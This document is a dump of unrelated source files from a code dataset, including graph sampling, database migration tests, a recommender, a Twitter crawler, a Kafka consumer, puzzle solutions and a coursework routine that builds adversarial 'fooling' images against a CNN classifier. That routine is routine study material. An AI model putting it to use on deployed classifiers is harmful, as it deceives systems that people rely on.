                if [index, col_index] in edges or [col_index, index] in edges:
                    # print("Yea")
                    continue
                edges.append([index, col_index])
    # print(len(edges))
    write_vertices_to_csv(edges, "{}.csv".format(name))

def write_vertices_to_csv(edges, name):
    with open(name, mode='w+', newline='') as stats_file:
        csv_writer = csv.writer(stats_file, delimiter=';', quotechar='"', quoting=csv.QUOTE_MINIMAL)
        for item in edges:
            csv_writer.writerow(item)

node_count = 1000
ba_matrix = create_barabasi_albert_graph_dynamic(node_count, 2, 10)
rn_matrix = create_random_graph(node_count, count_prop_for_edges(2043, node_count))
prob = 0.15
limit_p = True
# nodes_list = random_node_sampling(ba_matrix, prob)[1]
# degree_based_sampling(ba_matrix, prob)
mx_degree = get_max_degree(ba_matrix, range(1000))
plt.clf()
cummulative_distribution(5, ba_matrix, range(1000), "base", mx_degree)
cummulative_distribution(5, ba_matrix, random_node_sampling(ba_matrix, prob, limit_p)[1], "RNA", mx_degree)
cummulative_distribution(5, ba_matrix, degree_based_sampling(ba_matrix, prob, limit_p)[1], "dbs", mx_degree)
plot_chart("\\barabasi-albert")
write_vertices_to_csv(random_node_sampling(ba_matrix, prob, limit_p)[0], "barabasi-rnd.csv")
write_vertices_to_csv(degree_based_sampling(ba_matrix, prob, limit_p)[0], "barabasi-dbs.csv")
cummulative_distribution(5, rn_matrix, range(1000), "base", mx_degree)
cummulative_distribution(5, rn_matrix, random_node_sampling(rn_matrix, prob, limit_p)[1], "RNA", mx_degree)
cummulative_distribution(5, rn_matrix, degree_based_sampling(rn_matrix, prob, limit_p)[1], "dbs", mx_degree)
plot_chart("\\random_chart")
write_vertices_to_csv(random_node_sampling(rn_matrix, prob, limit_p)[0], "random-rnd.csv")
write_vertices_to_csv(degree_based_sampling(rn_matrix, prob, limit_p)[0], "random-dbs.csv")
safe_matrix_as_csv(rn_matrix, "cvic2RandomGraph")
safe_matrix_as_csv(ba_matrix, "cvic2BarabasiGraph")
authors: ["marek.ulip@gmail.com"]
author_id: marek.ulip@gmail.com
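The translated comment in `create_random_graph` refers to the Erdős–Rényi connectivity threshold, which is exactly what the otherwise-unused helper `count_min_probabilty` computes: G(n, p) is almost surely connected when p exceeds ln(n)/n. A quick check of the figure the comment cites:

```python
# Not part of the script: verify the 0.000921 threshold mentioned in the
# comment, and compare with the edge-based probability the script actually uses.
import math

n = 10_000
print(math.log(n) / n)           # ~0.000921, the sharp connectivity threshold
print(2 * 2043 / (n * (n - 1)))  # count_prop_for_edges(2043, n), for comparison
```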
---
blob_id: 58072c21f9c9605e3e4037d7720b652bca3fb124
directory_id: da2ba8fa3342bb317bed49832310ace66007f5da
path: /tests/api/utils/test_alembic_util.py
content_id: 9ab78537607e8c3ee9814901aad899872234c777
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: joaovitor3/mlrun
snapshot_id: 8316ee456a3306e2d9674ab875c84fd917412f66
revision_id: 9ad9a6b7ad900c29a9fada7223a5a3123a1a53ef
branch_name: refs/heads/master
visit_date: 2023-03-12T17:30:40.046032
revision_date: 2021-02-28T12:28:16
committer_date: 2021-02-28T12:28:16
github_id: null
star_events_count: 0
fork_events_count: 0
gha_license_id: null
gha_event_created_at: null
gha_created_at: null
gha_language: null
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 6,494
extension: py
content:
import alembic
import alembic.config
import os.path
import pathlib
import pytest
import shutil
import typing
import unittest.mock
import mlrun.api.utils.alembic
from mlrun import mlconf
class Constants(object):
revision_history = ["revision2", "revision1"]
initial_revision = "revision1"
latest_revision = "revision2"
unknown_revision = "revision3"
@pytest.mark.parametrize("from_scratch", [True, False])
def test_no_database_exists(
mock_alembic, mock_database, mock_shutil_copy, from_scratch
):
mock_database(db_file_exists=False)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == ["head"]
mock_shutil_copy.assert_not_called()
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_no_revision(
mock_alembic, mock_database, mock_shutil_copy, from_scratch
):
mock_database()
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
# from scratch should skip stamp even if no revision exists
expected_stamp_calls = ["revision1"] if not from_scratch else []
assert mock_alembic.stamp_calls == expected_stamp_calls
assert mock_alembic.upgrade_calls == ["head"]
mock_shutil_copy.assert_not_called()
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_known_revision(
mock_alembic, mock_database, mock_shutil_copy, mock_db_file_name, from_scratch
):
mock_database(current_revision=Constants.initial_revision)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == ["head"]
mock_shutil_copy.assert_called_once_with(
mock_db_file_name, pathlib.Path(f"{Constants.initial_revision}.db")
)
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_unknown_revision_successful_downgrade(
mock_alembic, mock_database, mock_shutil_copy, mock_db_file_name, from_scratch
):
mock_database(current_revision=Constants.unknown_revision)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == ["head"]
copy_calls = [
# first copy - backup the current database before downgrading
unittest.mock.call(
mock_db_file_name, pathlib.Path(f"{Constants.unknown_revision}.db")
),
# second copy - to downgrade to the old db file
unittest.mock.call(
pathlib.Path(f"{Constants.latest_revision}.db"), mock_db_file_name
),
# third copy - to back up the db file. In a real scenario the backup would be {latest_revision}.db
# as the revision should change during the last copy, but changing a mock during the init_alembic function
# is cumbersome and might make the test unreadable - so the current revision stays unknown_revision.
unittest.mock.call(
mock_db_file_name, pathlib.Path(f"{Constants.unknown_revision}.db")
),
]
mock_shutil_copy.assert_has_calls(copy_calls)
@pytest.mark.parametrize("from_scratch", [True, False])
def test_database_exists_unknown_revision_failed_downgrade(
mock_alembic, mock_database, mock_shutil_copy, mock_db_file_name, from_scratch
):
mock_database(
current_revision=Constants.unknown_revision, db_backup_exists=False,
)
alembic_util = mlrun.api.utils.alembic.AlembicUtil(pathlib.Path(""))
with pytest.raises(
RuntimeError,
match=f"Cannot fall back to revision {Constants.latest_revision}, "
f"no back up exists. Current revision: {Constants.unknown_revision}",
):
alembic_util.init_alembic(from_scratch=from_scratch)
assert mock_alembic.stamp_calls == []
assert mock_alembic.upgrade_calls == []
mock_shutil_copy.assert_not_called()
@pytest.fixture()
def mock_database(
monkeypatch, mock_alembic, mock_db_file_name
) -> typing.Callable[[typing.List[str], str, bool, bool], None]:
def _mock_database(
revision_history: typing.List[str] = None,
current_revision: str = "",
db_file_exists: bool = True,
db_backup_exists: bool = True,
):
revision_history = revision_history or Constants.revision_history
def _db_file_exists(file_name: str) -> bool:
if file_name == mock_db_file_name:
return db_file_exists
else:
return db_backup_exists
monkeypatch.setattr(os.path, "isfile", _db_file_exists)
def _current_revision(alembic_config: typing.Any):
if current_revision != "" and current_revision not in revision_history:
raise Exception(
f"Can't locate revision identified by '{current_revision}'"
)
alembic_config.print_stdout(current_revision)
mock_alembic.current = _current_revision
def _revision_history(alembic_config: typing.Any):
for revision in revision_history:
alembic_config.print_stdout(f"none -> {revision}, revision name")
mock_alembic.history = _revision_history
return _mock_database
@pytest.fixture()
def mock_db_file_name(monkeypatch) -> str:
db_file_name = "test.db"
monkeypatch.setattr(mlconf.httpdb, "dsn", db_file_name)
return db_file_name
@pytest.fixture()
def mock_shutil_copy(monkeypatch) -> unittest.mock.Mock:
copy = unittest.mock.Mock()
monkeypatch.setattr(shutil, "copy2", copy)
return copy
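# Stands in for alembic.command, recording stamp() and upgrade() calls so the tests can assert on them.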
class MockAlembicCommand(object):
def __init__(self):
self.stamp_calls = []
self.upgrade_calls = []
def stamp(self, alembic_config: typing.Any, revision: str):
self.stamp_calls.append(revision)
def upgrade(self, alembic_config: typing.Any, revision: str):
self.upgrade_calls.append(revision)
@pytest.fixture()
def mock_alembic(monkeypatch) -> MockAlembicCommand:
mocked_alembic_command = MockAlembicCommand()
monkeypatch.setattr(alembic, "command", mocked_alembic_command)
monkeypatch.setattr(alembic.config, "Config", unittest.mock.Mock())
return mocked_alembic_command
|
[
"noreply@github.com"
] |
joaovitor3.noreply@github.com
|
dd15e0124743808ae86ae4b6673293253dba1faa
|
a127d0feb3bcf4f2581f385bb24f2b789c771c9c
|
/10syo/95.py
|
aeb744b4427f8299c65072421e15fe33f65d4d91
|
[] |
no_license
|
NgoVanDau/nlp100knock
|
01383e4cc5a1470508744668103b9ea1a238b892
|
3ef63c0d2dfb55c0e6a31aced645f284325a98a5
|
refs/heads/master
| 2023-03-22T13:19:23.932429
| 2018-08-05T05:27:11
| 2018-08-05T05:27:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 788
|
py
|
# coding: utf-8
import numpy as np
fname_input = 'combined_out.tab'
with open(fname_input, 'rt') as data_file:
    # Build the lists of similarity scores (human judgments and our scores)
human_score = []
my_score = []
N = 0
for line in data_file:
cols = line.split('\t')
human_score.append(float(cols[2]))
my_score.append(float(cols[3]))
N += 1
    # Sort: argsort gives the indices that would order each score list
human_index_sorted = np.argsort(human_score)
my_index_sorted = np.argsort(my_score)
    # Build the rank arrays
human_order = [0] * N
my_order = [0] * N
for i in range(N):
human_order[human_index_sorted[i]] = i
my_order[my_index_sorted[i]] = i
    # Compute Spearman's rank correlation: rho = 1 - 6 * sum(d^2) / (N^3 - N)
total = 0
for i in range(N):
total += pow(human_order[i] - my_order[i], 2)
result = 1 - (6 * total) / (pow(N, 3) - N)
print(result)
|
[
"kota.k.1132.pda@gmail.com"
] |
kota.k.1132.pda@gmail.com
|
6deb1c1dc2a5dc573a565342c04f98f906e1d989
|
9f9d699444208a203a0c666c87a64f675a6541e4
|
/Recommendations.py
|
5c764bfa33509543f355b356cbb73349306814eb
|
[] |
no_license
|
KiratiBhuva/Yelp-Recommendation-Analytics
|
ba231e6c1a4f993620abd51e731e1c5cced5225e
|
36991fef0aaf5b65cf52cf562e10da18a9ae773d
|
refs/heads/master
| 2020-04-07T06:59:04.242027
| 2018-11-17T22:56:45
| 2018-11-17T22:56:45
| 158,158,638
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,484
|
py
|
import numpy as np
import pandas as pd
import os
import sys
from surprise import BaselineOnly
from surprise import Dataset
from surprise import dataset
from surprise import Reader
from surprise import SVD
from surprise import accuracy
from surprise.model_selection import KFold
from surprise import KNNBasic
from surprise.model_selection import cross_validate, train_test_split
from time import time
from collections import defaultdict
import pickle
from BusinessInsights import TopRecommendation
class Recommendation_System:
def __init__(self):
tr = TopRecommendation()
self.reviewData,self.userData,self.restaurantData = tr.prepareData()
self.top_recs = defaultdict(list)
def prepare_data(self):
ldata = Dataset.load_from_df(self.reviewData[['user_id', 'business_id', 'stars']], Reader(rating_scale=(1, 5)))
return ldata
def build_model(self,data):
algo = SVD()
cross_validate(algo, data, measures=['RMSE', 'MAE'], cv=5)
return algo
def get_anti_testset(self, data):
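        # build_anti_testset yields every (user, item) pair missing from the trainset, filled with the global mean rating.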
data_train = data.build_full_trainset()
testset = data_train.build_anti_testset()
return testset
def store_predictions(self, testset,algo):
result = []
for row in testset:
result.append(algo.predict(row[0], row[1]))
return result
def get_recommendations(self, predictions, topN):
for uid, iid, r_ui, est, details in predictions:
self.top_recs[uid].append((iid, est))
for uid, user_ratings in self.top_recs.items():
user_ratings.sort(key=lambda x: x[1], reverse=True)
self.top_recs[uid] = user_ratings[:topN]
return self.top_recs
def get_recommendation_for_uid(self, user_id):
for uid, user_ratings in self.top_recs.items():
if (uid == user_id):
return uid, ([iid for (iid, _) in user_ratings])
return ''
if __name__ == '__main__':
rs = Recommendation_System()
data = rs.prepare_data()
print(len(data.df))
algo = rs.build_model(data)
test_set = rs.get_anti_testset(data)
start = time()
predictions = rs.store_predictions(test_set,algo)
end = time()
print((end - start )/60)
recommendations = rs.get_recommendations(predictions, 5)
pickle.dump(recommendations, open("model.pkl","wb"))
print("Model Dumped Successfully")
|
[
"nikhil.agrawal@sjsu.edu"
] |
nikhil.agrawal@sjsu.edu
|
e5ef3ebaa0969ae64b22fc95d380e2ab5550fc72
|
5e2c620ef66ecc72d67b6918a63743f8ecc8b5f3
|
/backend/app/db/mixins/eagerload.py
|
e8b5c511fca75d1310052947d5436140e997b4a0
|
[
"MIT"
] |
permissive
|
webclinic017/fastapi-admin-panel
|
00eda9d9f44346d59818aa76b363afe96ffb4be1
|
ba12ad16fe1fdd0f9ec2282b8aa9965bce858cda
|
refs/heads/main
| 2023-09-03T13:13:57.531141
| 2021-11-18T13:52:20
| 2021-11-18T13:52:20
| 482,085,378
| 1
| 0
|
MIT
| 2022-04-15T21:10:31
| 2022-04-15T21:10:30
| null |
UTF-8
|
Python
| false
| false
| 3,696
|
py
|
from sqlalchemy import select
from sqlalchemy.orm import joinedload, selectinload
from sqlalchemy.orm.attributes import InstrumentedAttribute
from sqlalchemy.sql import Select
from extra.types import Paths
JOINED = "joined"
SUBQUERY = "subquery"
def eager_expr(schema: dict) -> list:
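    # Convert a nested eager-loading schema into a flat list of SQLAlchemy loader options.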
flat_schema = _flatten_schema(schema)
return _eager_expr_from_flat_schema(flat_schema)
def _flatten_schema(schema: dict) -> dict:
def _flatten(schema: dict, parent_path: str, result: dict) -> None:
for path, value in schema.items():
# for supporting schemas like Product.user: {...},
# we transform, say, Product.user to 'user' string
if isinstance(path, InstrumentedAttribute):
path = path.key
if isinstance(value, tuple):
join_method, inner_schema = value[0], value[1]
elif isinstance(value, dict):
join_method, inner_schema = JOINED, value
else:
join_method, inner_schema = value, None
full_path = parent_path + "." + path if parent_path else path
result[full_path] = join_method
if inner_schema:
_flatten(inner_schema, full_path, result)
result = {}
_flatten(schema, "", result)
return result
def _eager_expr_from_flat_schema(flat_schema: dict) -> list:
result = []
for path, join_method in flat_schema.items():
if join_method == JOINED:
result.append(joinedload(path))
elif join_method == SUBQUERY:
result.append(selectinload(path))
else:
raise ValueError("Bad join method `{}` in `{}`".format(join_method, path))
return result
class EagerLoadMixin:
__abstract__ = True
@classmethod
def with_(cls, schema: dict) -> Select:
"""
Query class and eager load schema at once.
Example:
schema = {
'user': JOINED, # joinedload user
'comments': (SUBQUERY, { # load comments in separate query
'user': JOINED # but, in this separate query, join user
})
}
# the same schema using class properties:
schema = {
Post.user: JOINED,
Post.comments: (SUBQUERY, {
Comment.user: JOINED
})
}
await User.with_(schema).first(db)
"""
return select(cls).options(*eager_expr(schema or {}))
@classmethod
def with_joined(cls, *paths: Paths) -> Select:
"""
        Eager load for simple cases where we only need to
        joined-load some relations.
        In string syntax, you can split relations with a dot
        due to this SQLAlchemy feature: https://goo.gl/yM2DLX
Example 1:
await Comment.with_joined('user', 'post', 'post.comments').first(db)
Example 2:
await Comment.with_joined(Comment.user, Comment.post).first(db)
"""
options = [joinedload(path) for path in paths]
return select(cls).options(*options)
@classmethod
def with_subquery(cls, *paths: Paths) -> Select:
"""
        Eager load for simple cases where we only need to
        load some relations in separate SELECT IN queries (selectin loading).
        In string syntax, you can split relations with a dot
        (it's a SQLAlchemy feature)
Example 1:
await User.with_subquery('posts', 'posts.comments').all(db)
Example 2:
await User.with_subquery(User.posts, User.comments).all(db)
"""
options = [selectinload(path) for path in paths]
return select(cls).options(*options)
|
[
"gsilents226@gmail.com"
] |
gsilents226@gmail.com
|
9fddd3021dd17be191feceb86765012109d7ceb3
|
edf8d011e3d4f30346b10adc6842efa5691fbcaa
|
/app/models/WfTaskHist.py
|
ff28484e9bae01e56745fdc4588c68ea8489e2a7
|
[] |
no_license
|
tianzhonghai/glaucus
|
fcdc06c93fdda078fb69f10620167d70cc9b6070
|
ef4d92b0cfb81b67c35c19f7d9d8cae4138d467b
|
refs/heads/master
| 2020-04-09T01:27:00.551806
| 2019-01-06T04:28:16
| 2019-01-06T04:28:16
| 159,904,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 995
|
py
|
from .. import db
class WfTaskHist(db.Model):
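    # One history row per workflow task activity: what was done, by whom, and when.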
__tablename__ = 'wf_task_hist'
id = db.Column("id", db.Integer, primary_key=True, autoincrement=True)
deploy_id = db.Column("deploy_id", db.Integer, unique=False, nullable=False)
act_name = db.Column("act_name", db.String(45), unique=False, nullable=False)
act_type = db.Column("act_type", db.String(45), unique=False, nullable=False)
assignee_id = db.Column("assignee_id", db.Integer, unique=False, nullable=False)
assignee_account = db.Column("assignee_account", db.String(45), unique=False, nullable=False)
created_at = db.Column("created_at", db.DateTime, unique=False, nullable=False)
def __init__(self, deploy_id, act_name, act_type, assignee_id, assignee_account, created_at):
self.deploy_id = deploy_id
self.act_name = act_name
self.act_type = act_type
self.assignee_id = assignee_id
self.assignee_account = assignee_account
self.created_at = created_at
|
[
"tianzhh@fosun.com"
] |
tianzhh@fosun.com
|
0acef9c3808e7a5b7f9f88de92b9ba643d82dab7
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_157/699.py
|
b61de520301c8729931126c7dd1be5b969307475
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,002
|
py
|
T = int(raw_input().strip())
I, J, K = 2, 3, 4
def sign(x):
if x < 0:
return -1
else:
return 1
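# Signed quaternion multiplication table: units 1, i, j, k are encoded as 1, 2, 3, 4,
# and the sign of each entry carries the sign of the product.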
PROD = [
[1, I, J, K],
[I, -1, K, -J],
[J, -K, -1, I],
[K, J, -I, -1]]
def quat(a, b):
return PROD[a - 1][b - 1]
def translate(inp):
if inp == "i":
return I
elif inp == "j":
return J
else:
return K
for i in xrange(T):
L, X = map(int, raw_input().strip().split(' '))
lis = list(raw_input().strip())
lis = [translate(li) for li in lis]
lx = L * X
if lx < 3:
print "Case #%s: %s" % (i + 1, "NO")
continue
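    # front[j] is the quaternion product of lis[0..j]; back[j] the product of lis[j..].
    # Quaternion multiplication is non-commutative, so both directions are tracked.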
front = [1 for _ in xrange(lx)]
back = [1 for _ in xrange(lx)]
front[0] = lis[0]
back[-1] = lis[-1]
i_good, k_good = set(), set()
if front[0] == I:
i_good.add(0)
if back[-1] == K:
k_good.add(lx - 1)
for j in xrange(1, lx):
front[j] = sign(front[j - 1]) * quat(abs(front[j - 1]), lis[j % L])
if front[j] == I:
i_good.add(j)
for j in xrange(lx - 2, -1, -1):
back[j] = sign(back[j + 1]) * quat(lis[j % L], abs(back[j + 1]))
if back[j] == K:
k_good.add(j)
i_good = sorted(i_good)
il = len(i_good)
i_index = 0
k_good = sorted(k_good)
kl = len(k_good)
k_index = 0
if il == 0 or kl == 0:
print "Case #%s: %s" % (i + 1, "NO")
continue
while k_index < kl and i_good[i_index] + 1 >= k_good[k_index]:
k_index += 1
if k_index == kl:
print "Case #%s: %s" % (i + 1, "NO")
continue
found = False
while k_index < kl and i_index < il:
if back[i_good[i_index] + 1] == I:
found = True
break
i_index += 1
if i_index == il:
break
while k_index < kl and i_good[i_index] + 1 >= k_good[k_index]:
k_index += 1
if found:
print "Case #%s: %s" % (i + 1, "YES")
else:
print "Case #%s: %s" % (i + 1, "NO")
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
aa6cc554f58f5e5557ef4d3c1753c1802ff1d72e
|
67f38b82ff80ac3473457e0ec777a531847d9cfc
|
/crawlFirehose.py
|
b5d6df1a954915e93c9a26b0f7c444120f94de85
|
[] |
no_license
|
arapat/election-tweets-crawler
|
838b12cfaa96ef2c6b6b6f30dd39049c3e3af6ce
|
4f9aca7efa839f1d22071b456696ccbbdb9de361
|
refs/heads/master
| 2021-01-17T13:07:09.176992
| 2016-11-18T21:52:49
| 2016-11-18T21:52:49
| 39,797,792
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,835
|
py
|
import json
import os
import sys
from time import localtime, strftime, sleep
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
# Twitter API user credentials
vault = json.load(open("credentials.json"))
TWITTER_ACCESS_TOKEN = vault["TWITTER_ACCESS_TOKEN"]
TWITTER_TOKEN_SECRET = vault["TWITTER_TOKEN_SECRET"]
TWITTER_CONSUMER_KEY = vault["TWITTER_CONSUMER_KEY"]
TWITTER_CONSUMER_SECRET = vault["TWITTER_CONSUMER_SECRET"]
def show_message(message):
sys.stdout.write("[%s] " % strftime("%Y-%m-%d %H:%M:%S", localtime()))
sys.stdout.write(message + "\n")
sys.stdout.flush()
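# Prints each tweet to stdout. On HTTP 420 (rate limited) it backs off linearly with
# each consecutive error; 200 successfully received messages reset the backoff.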
class StdOutListener(StreamListener):
def __init__(self):
self._420 = 0
self._okay_count = 0
def on_data(self, data):
print data
self._okay_count += 1
if self._okay_count >= 200:
self._420 = 0
return True
def on_error(self, status_code):
show_message("Error code: %d" % status_code)
if status_code == 420:
self._okay_count = 0
self._420 = self._420 + 1
show_message("Sleeping %d seconds before restart..." % (60 * self._420))
sleep(60 * self._420)
if __name__ == '__main__':
# Twitter authentication
auth = OAuthHandler(TWITTER_CONSUMER_KEY, TWITTER_CONSUMER_SECRET)
auth.set_access_token(TWITTER_ACCESS_TOKEN, TWITTER_TOKEN_SECRET)
listener = StdOutListener()
stream = Stream(auth, listener)
while True:
try:
show_message('(Re)start streaming...')
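            # Bounding box (SW lon, SW lat, NE lon, NE lat) covering roughly the contiguous United States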
LOCATIONS = [-124.85, 24.39, -66.88, 49.38]
stream.filter(locations=LOCATIONS)
except Exception as e:
            # Keep the crawler running without being interrupted by exceptions
show_message("Exception: " + str(e))
|
[
"jalafate@gmail.com"
] |
jalafate@gmail.com
|
5a0bd582d2812e2f1ea919c2428e1a0975635904
|
31daf45a61c356f453d8a91a4272fe0ad21906cf
|
/clients/python/consumer.py
|
8ffa1a72bf8f0103fbbd576fec3881c99e2b62ae
|
[] |
no_license
|
pmdcosta/apache-kafka
|
ee6953a464f508d5c7ac186624064a535e7a22fd
|
a8750e1d7b0bebe76e36383ff6c3130ca5fb6569
|
refs/heads/master
| 2020-04-14T11:50:52.141601
| 2016-02-19T16:51:53
| 2016-02-19T16:51:53
| 51,597,726
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 525
|
py
|
from kafka import KafkaConsumer
# To consume latest messages and auto-commit offsets
consumer = KafkaConsumer(group_id='python_01', bootstrap_servers=['172.17.0.3:9092'])
consumer.subscribe(topics=['topic'])
try:
for message in consumer:
print("%s:%d:%d: key=%s value=%s" % (message.topic, message.partition,
message.offset, message.key,
message.value))
except KeyboardInterrupt:
consumer.close()
print("Closed")
|
[
"pmdcosta@outlook.com"
] |
pmdcosta@outlook.com
|
2e38374915f2ecbab48db2b63453ab8b8ee6cc16
|
f9459d1eb795f6778c043ac05890af86024fb65b
|
/Network_Visualization_and_Style_Transfer/visualizers/fooling_image.py
|
ad16a50dd938097758dbb3684304686f7fdc3d79
|
[] |
no_license
|
jiani556/Deep-Learning
|
a431591b04854121cc133e3545d2452a07d3b710
|
9463299e76ee200518e1448fdaf518339d773238
|
refs/heads/main
| 2023-09-06T03:53:15.472823
| 2021-11-24T16:00:22
| 2021-11-24T16:00:22
| 367,668,536
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,659
|
py
|
import torch
from torch.autograd import Variable
class FoolingImage:
def make_fooling_image(self, X, target_y, model):
"""
Generate a fooling image that is close to X, but that the model classifies
as target_y.
Inputs:
- X: Input image; Tensor of shape (1, 3, 224, 224)
- target_y: An integer in the range [0, 1000)
- model: A pretrained CNN
Returns:
        - X_fooling: An image that is close to X, but that is classified as target_y
by the model.
"""
model.eval()
# Initialize our fooling image to the input image, and wrap it in a Variable.
X_fooling = X.clone()
X_fooling_var = Variable(X_fooling, requires_grad=True)
# We will fix these parameters for everyone so that there will be
# comparable outputs
        learning_rate = 10  # fixed gradient step size
max_iter = 100 # maximum number of iterations
for it in range(max_iter):
# Forward
scores = model(X_fooling_var)
            # Check whether the model is already fooled
_, max_index = scores.data.max(dim=1)
if max_index[0] == target_y:
break
# Scores of target_y
target_score = scores[0, target_y]
# Backward
target_score.backward()
# Gradient
im_grad = X_fooling_var.grad.data
# update x with normalised gradient
X_fooling_var.data += learning_rate * (im_grad / im_grad.norm())
X_fooling_var.grad.data.zero_()
X_fooling = X_fooling_var.data
return X_fooling
|
[
"longjiani556@gmail.com"
] |
longjiani556@gmail.com
|
1dc881eb407851b67d23e4d50f686b37e45a39a4
|
9233da96e09317d423291d8bf8f1457ce75cfc8e
|
/2016/8/screen.py
|
657f3a4b019b55c2bfd0ef3005d7314ff58921e4
|
[] |
no_license
|
ryanfox/advent-of-code
|
bf6f2d220d29849dca2bda1ddd0813408dde6c3f
|
59836ca363e041f31ef933953b82a67f430d38fc
|
refs/heads/master
| 2020-04-09T03:33:18.975018
| 2018-12-03T17:56:23
| 2018-12-03T17:56:23
| 159,987,144
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,954
|
py
|
inputs = '''rect 1x1
rotate row y=0 by 10
rect 1x1
rotate row y=0 by 10
rect 1x1
rotate row y=0 by 5
rect 1x1
rotate row y=0 by 3
rect 2x1
rotate row y=0 by 4
rect 1x1
rotate row y=0 by 3
rect 1x1
rotate row y=0 by 2
rect 1x1
rotate row y=0 by 3
rect 2x1
rotate row y=0 by 2
rect 1x1
rotate row y=0 by 3
rect 2x1
rotate row y=0 by 5
rotate column x=0 by 1
rect 4x1
rotate row y=1 by 12
rotate row y=0 by 10
rotate column x=0 by 1
rect 9x1
rotate column x=7 by 1
rotate row y=1 by 3
rotate row y=0 by 2
rect 1x2
rotate row y=1 by 3
rotate row y=0 by 1
rect 1x3
rotate column x=35 by 1
rotate column x=5 by 2
rotate row y=2 by 5
rotate row y=1 by 5
rotate row y=0 by 2
rect 1x3
rotate row y=2 by 8
rotate row y=1 by 10
rotate row y=0 by 5
rotate column x=5 by 1
rotate column x=0 by 1
rect 6x1
rotate row y=2 by 7
rotate row y=0 by 5
rotate column x=0 by 1
rect 4x1
rotate column x=40 by 2
rotate row y=2 by 10
rotate row y=0 by 12
rotate column x=5 by 1
rotate column x=0 by 1
rect 9x1
rotate column x=43 by 1
rotate column x=40 by 2
rotate column x=38 by 1
rotate column x=15 by 1
rotate row y=3 by 35
rotate row y=2 by 35
rotate row y=1 by 32
rotate row y=0 by 40
rotate column x=32 by 1
rotate column x=29 by 1
rotate column x=27 by 1
rotate column x=25 by 1
rotate column x=23 by 2
rotate column x=22 by 1
rotate column x=21 by 3
rotate column x=20 by 1
rotate column x=18 by 3
rotate column x=17 by 1
rotate column x=15 by 1
rotate column x=14 by 1
rotate column x=12 by 1
rotate column x=11 by 3
rotate column x=10 by 1
rotate column x=9 by 1
rotate column x=8 by 2
rotate column x=7 by 1
rotate column x=4 by 1
rotate column x=3 by 1
rotate column x=2 by 1
rotate column x=0 by 1
rect 34x1
rotate column x=44 by 1
rotate column x=24 by 1
rotate column x=19 by 1
rotate row y=1 by 8
rotate row y=0 by 10
rotate column x=8 by 1
rotate column x=7 by 1
rotate column x=6 by 1
rotate column x=5 by 2
rotate column x=3 by 1
rotate column x=2 by 1
rotate column x=1 by 1
rotate column x=0 by 1
rect 9x1
rotate row y=0 by 40
rotate column x=43 by 1
rotate row y=4 by 10
rotate row y=3 by 10
rotate row y=2 by 5
rotate row y=1 by 10
rotate row y=0 by 15
rotate column x=7 by 2
rotate column x=6 by 3
rotate column x=5 by 2
rotate column x=3 by 2
rotate column x=2 by 4
rotate column x=0 by 2
rect 9x2
rotate row y=3 by 47
rotate row y=0 by 10
rotate column x=42 by 3
rotate column x=39 by 4
rotate column x=34 by 3
rotate column x=32 by 3
rotate column x=29 by 3
rotate column x=22 by 3
rotate column x=19 by 3
rotate column x=14 by 4
rotate column x=4 by 3
rotate row y=4 by 3
rotate row y=3 by 8
rotate row y=1 by 5
rotate column x=2 by 3
rotate column x=1 by 3
rotate column x=0 by 2
rect 3x2
rotate row y=4 by 8
rotate column x=45 by 1
rotate column x=40 by 5
rotate column x=26 by 3
rotate column x=25 by 5
rotate column x=15 by 5
rotate column x=10 by 5
rotate column x=7 by 5
rotate row y=5 by 35
rotate row y=4 by 42
rotate row y=2 by 5
rotate row y=1 by 20
rotate row y=0 by 45
rotate column x=48 by 5
rotate column x=47 by 5
rotate column x=46 by 5
rotate column x=43 by 5
rotate column x=41 by 5
rotate column x=38 by 5
rotate column x=37 by 5
rotate column x=36 by 5
rotate column x=33 by 1
rotate column x=32 by 5
rotate column x=31 by 5
rotate column x=30 by 1
rotate column x=28 by 5
rotate column x=27 by 5
rotate column x=26 by 5
rotate column x=23 by 1
rotate column x=22 by 5
rotate column x=21 by 5
rotate column x=20 by 1
rotate column x=17 by 5
rotate column x=16 by 5
rotate column x=13 by 1
rotate column x=12 by 3
rotate column x=7 by 5
rotate column x=6 by 5
rotate column x=3 by 1
rotate column x=2 by 3'''
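# Rotate a sequence to the right by `distance` positions, wrapping elements around.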
def rotate(subject, distance):
return subject[-distance:] + subject[0:-distance]
def process_instruction(instruction, screen):
new_screen = [row[:] for row in screen]
parts = instruction.split()
if parts[0] == 'rect':
cols, rows = (int(component) for component in parts[1].split('x'))
for i in range(rows):
for j in range(cols):
new_screen[i][j] = 1
elif parts[0] == 'rotate':
